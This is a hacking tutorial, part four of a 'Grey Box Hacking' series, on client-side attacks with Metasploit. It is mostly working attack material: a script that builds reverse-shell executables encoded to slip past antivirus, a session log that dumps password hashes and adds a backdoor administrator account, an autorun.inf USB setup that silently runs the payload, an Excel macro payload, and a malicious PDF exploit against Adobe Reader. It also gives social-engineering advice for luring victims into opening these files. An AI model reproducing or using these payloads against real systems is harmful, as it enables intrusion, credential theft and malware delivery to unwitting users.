Client-Side Attack With Metasploit (Part 4)
This is part four of the Grey Box Hacking tutorials. Before discussing the client-side attack, it is important to first comprehend what client-side means before an attack using Metasploit can be understood.
In short, the client-side is when someone (the client) is doing operations on a client-server in a computer network.
A client-side attack takes advantage of the client-server relationship. The job of servers is to expose services to clients. With these services exposed, the clients can interact with them. A good example would be an instant messaging application.
Since the server exposes services, it also exposes possible weaknesses in the network. As the client is connected to this network, they are also exposed to those same weaknesses. Attackers use these weaknesses to gain access to the network and to the clients’ computers.
It is called a client-side attack because it requires the client to initiate a vulnerable service before the attack can take place. Savvy attackers use programs such as Metasploit to achieve this.
[0x04] – Client-Side Attack With Metasploit
“A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system.
“Client-side attacks are not limited to the web setting but can occur on any client/server pairs, for example, e-mail, FTP, instant messaging, multimedia streaming, etc.
“Client-side attacks currently represent an easy attack vector because most attention in protection technology has been focused on the protection of exposed servers from remote attackers.
“Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect a limited set of client technologies.” –honeynet.org
[0x04a] – Metasploit Payload Generator
Metasploit Payload Generator is a tool that allows one to easily create a malicious code. This is not a tool used to exploit a system. It is used to create the malicious payload and, which will then be saved as an “exe.” The tricky part of the operation is establishing a way to lure the target into downloading the payload onto their computer.
A feature is available to encode the payload so that it gets past most AV and IDS/IPS (13 Encoding Choices).
This is done by using Metasploit Payload Generator from Fast-Track.
#!/bin/bash echo "###########################################" echo "#### 0-Days Exploits with MetaCompiler ####" echo "###########################################" echo "" echo -n "Enter your Listener IP Address: " read ip echo -n "Enter your Listener Port: " read port echo "" echo "-= MetaCompiler Payloads =-" echo "" echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +" echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +" echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +" echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +" echo "+ Mac OSX (iphone) Reverse Shell - osx/ppc/shell/reverse_tcp +" echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +" echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" echo "" echo -n "Enter your Payload Exploit: " read payload echo -n "Enter your Output file name (xpl.exe): " read file echo "" echo "-= Processing =-" /pentest/exploits/framework3/msfpayload $payload LHOST=$ip LPORT=$port R | /pentest/exploits/framework3/msfencode -b '' -t exe -o $file echo "Enjoy 0-Days Exploit with $file ;)" echo "" echo "" echo "-= Now Waiting for Reverse Connection from Victim =-" /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=$payload LHOST=$ip LPORT=$port DisableCourtesyShell=True E
Below at the instructions for using Fast Track.
bt fast-track # ./fast-track.py -i *********************************************** ******* Performing dependency checks... ******* *********************************************** *** FreeTDS and PYMMSQL are installed. (Check) *** *** PExpect is installed. (Check) *** *** ClientForm is installed. (Check) *** *** Psyco is installed. (Check) *** *** Beautiful Soup is installed. (Check) *** *** PyMills is installed. (Check) *** Also ensure ProFTP, WinEXE, and SQLite3 is installed from the Updates/Installation menu. Your system has all requirements needed to run Fast-Track! Fast-Track Main Menu: Fast-Track - Where it's OK to finish in under 3 minutes... Version: v4.0 Written by: David Kennedy (ReL1K) http://www.securestate.com http://www.thepentest.com 1. Fast-Track Updates 2. External Hacking 3. Internal Hacking 4. Exploits 5. SQLPwnage 6. Payload Generator 7. Tutorials 8. Changelog 9. Credits 10. About 11. Exit Enter the number: 6 Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. ##################################### ### ### ### Metasploit Payload Generator ### ### ### ### Written by: Dave Kennedy ### ### aka ReL1K ### ### ### ##################################### ##################################### The Metasploit Payload Generator is a simple tool to make it extremely easy to generate a payload and listener on the Metasploit framework. This does not actually exploit any systems, it will generate a metasploit payload for you and save it to an executable. You then need to someone get it on the remote server by yourself and get it to execute correctly. This will also encode your payload to get past most AV and IDS/IPS. What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to the attacker. 2. Windows Reverse_TCP Meterpreter Spawn a Meterpreter shell on victim and send back to the attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to the attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to the attacker. 6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on the victim through Reflective to the attacker. Enter choice (example 1-6): 2 Below is a list of encodings for bypassing most AV. Select one of the below, Avoid_UTF8_tolower usually gets past them. 1. avoid_utf8_tolower 2. shikata_ga_nai 3. alpha_mixed 4. alpha_upper 5. call4_dword_xor 6. countdown 7. fnstenv_mov 8. jmp_call_additive 9. nonalpha 10. nonupper 11. unicode_mixed 12. unicode_upper 13. alpha2 14. No Encoding Enter your choice : 2 Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131 Enter the port of the Listener: 5555 Do you want to create an EXE or Shellcode 1. Executable 2. Shellcode Enter your choice: 1 Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 278 Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai A payload has been created in this directory and is named 'payload.exe'. Enjoy! Do you want to start a listener to receive the payload yes or no: yes Launching Listener. *********************************************************************************************** Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp' Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai *********************************************************************************************** [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948) meterpreter > getuid Server username: LENOVO-X200prathan meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7 prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52 meterpreter > execute -H -i -f cmd.exe Process 692 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Documents and SettingsprathanDesktop>hostname LENOVO-X200 C:Documents and SettingsprathanDesktop>net user cwh 1234 /add net user cwh 1234 /add The command completed successfully. C:Documents and SettingsprathanDesktop>net localgroup administrators cwh /add net localgroup administrators cwh /add The command completed successfully. C:Documents and SettingsprathanDesktop>net user net user User accounts for ------------------------------------------------------------------------------- Administrator cwh Guest prathan TsInternetUser The command completed with one or more errors.
From Above, We can Attack victim from Social-engineering if they execute “payload.exe”. What’s happen If we use Autorun.inf to force them to execute our files.
+autorun.inf [autorun] action=Open Files On Folder icon=iconsdrive.ico shellexecute=nircmd.exe execmd CALL batexeprogstart.bat +icons +nircmd.exe +batexe -progstart.bat @echo off nircmd.exe execmd CALL batexemoddump.bat nircmd.exe execmd CALL batexemodsmax.bat -moddump.bat @echo off nircmd.exe execmd .batexepayload.exe -modsmax.bat @echo off start nircmd.exe win max ititle "Remo"
If the victim opens a USB drive with Autorun or they Double-click the USB drive from My computer, the target system will be compromised.
[0x04b] – MS-Office Macro Ownage
MS Word, Excel, Powerpoint, as well as other similar programs can import VBscript to their files. Metasploit can generate VBScript that contains a Malicious.
In this example, we will show script for exploiting victim with MS-Excel. The victim machine will start reverse VNC to the attacker’s machine after the victim opens the MS-Excel file.
bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2658 bytes) [*] Sleeping before handling stage...
Now we have “script.bash,” Open MSExcel -> Tools -> Macro -> Visual Basic Editor then import “script.bash” and SAVE Excel file.
After this is finished, the attacker employs human-to-human social engineering to manipulate them into opening MSExcel, enabling Macros. The attacker can then take control of the target’s computer.
[0x04c] – AdobeReader PDF Ownage
Metasploit has an exploit script for Generating Malicious PDF files used to issue an attack through “Adobe JBIG2Decode Memory Corruption.”
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
When a malicious PDF is generated, it is sent to the victim(s). Social engineering is used to get them to download it onto their computer.
bt framework3 # msfconsole _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __| | | | | | | __/ || (_| __ |_) | | (_) | | |_ |_| |_| |_|___|____,_|___/ .__/|_|___/|_|__| | | |_| =[ msf v3.3-dev + -- --=[ 288 exploits - 124 payloads + -- --=[ 17 encoders - 6 nops =[ 56 aux msf > use windows/fileformat/adobe_jbig2decode msf exploit(adobe_jbig2decode) > set TARGET 0 TARGET => 0 msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf FILENAME => malfile.pdf msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131 LHOST => 192.168.80.131 msf exploit(adobe_jbig2decode) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'malfile.pdf' file... [*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_jbig2decode) > exit bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.80.131 E [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stanger for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041) meterpreter > getuid Server username: WINXPvictim meterpreter > execute -H -i -f cmd.exe Process 692 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\victim\Desktop>
Other techniques such as “DNS Spoofing+IE7” was great for Mass Exploit, There is a video here that shows this technique.
This method uses Ettercap for DNS spoofing then use Metasploit for handling reverse shell from “IE7 MS09-002 Memory Corruption Vulnerability.” This forces all machines in the same network drive to the attacker’s machine.